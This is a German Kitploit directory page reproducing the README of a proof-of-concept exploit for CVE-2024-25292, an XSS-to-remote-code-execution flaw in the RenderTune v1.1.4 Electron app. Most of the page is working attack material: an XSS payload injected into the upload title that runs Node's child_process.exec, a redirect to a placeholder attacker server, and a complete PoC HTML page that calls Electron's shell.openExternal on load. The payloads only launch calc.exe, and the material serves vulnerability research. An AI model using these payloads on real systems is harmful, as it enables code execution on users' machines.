Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/eqstlab/cve-2024-25292
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

XSS-zu-RCE-Exploit in RenderTune v1.1.4

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RenderTune RCE

Ein Proof-of-Concept für die Schwachstelle CVE-2024-25292.

Eine Cross-Site-Scripting (XSS)-Schwachstelle in RenderTune v1.1.4 ermöglicht Angreifern, beliebige Web-Skripte oder HTML über eine manipulierte Nutzlast auszuführen, die in den Parameter 'Upload Title' injiziert wird. In diesem Repository befinden sich eine beispielhafte verwundbare Anwendung und ein Proof-of-Concept (PoC)-Exploit dafür.

Als PoC gibt es eine Python-Datei, die den Prozess automatisiert.

1. Schwachstellenübersicht:

Es handelt sich um eine Schwachstelle, die RCE durch XSS ermöglicht. Es gibt einen XSS-fähigen Teil des Titels, daher handelt es sich um eine Schwachstelle, die RCE durch die Syntax von NodeJS über die Syntax von XSS ermöglicht.


2. Ursache der Schwachstelle:

  • nteract 0.28.0 erlaubt Electron-Webview über Markdown-Links, was zu Remote Code Execution führt (weil nodeIntegration in webPreferences true ist).
  • Erklärung des Exploits
    • Wenn innerhalb der Anwendung Links über MarkDown generiert werden, erstellt sie einen WebView über Electron, der externen Zugriff auf den Link ermöglicht. Folglich kann ein Angreifer Remote Code Execution (RCE) erreichen, indem er eine Verbindung zu dem Link herstellt, der zum Server des Angreifers führt.

Proof-of-Concept (PoC)

Fall 1) XSS zu RCE.

Schritt 1) Bestätigen, dass XSS im Titelteil auftritt ※ Zu diesem Zeitpunkt wird der Upload-Eintrag nicht registriert, es sei denn, das Bild wird angehängt.

root@kitploit:~
<b>jruru</b>

1

Schritt 2) Daher wird es konfiguriert, XSS zu verwenden, um NodeJS-Systembefehle auszuführen.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

Fall 2) Angriffe über einen Angreiferserver

※ Wenn Sie einen Angriff mit window.location versuchen, gelangen Sie automatisch zu der von Ihnen festgelegten Seite, jedes Mal wenn Sie die App ausführen.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

Hinweis: ※ Wenn Sie es schnell testen möchten, erstellen Sie einen Server auf dem PC des Angreifers mit folgendem Code.

root@kitploit:~
$ python -m http.server 80
  • PoC-Code
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


Tool herunterladen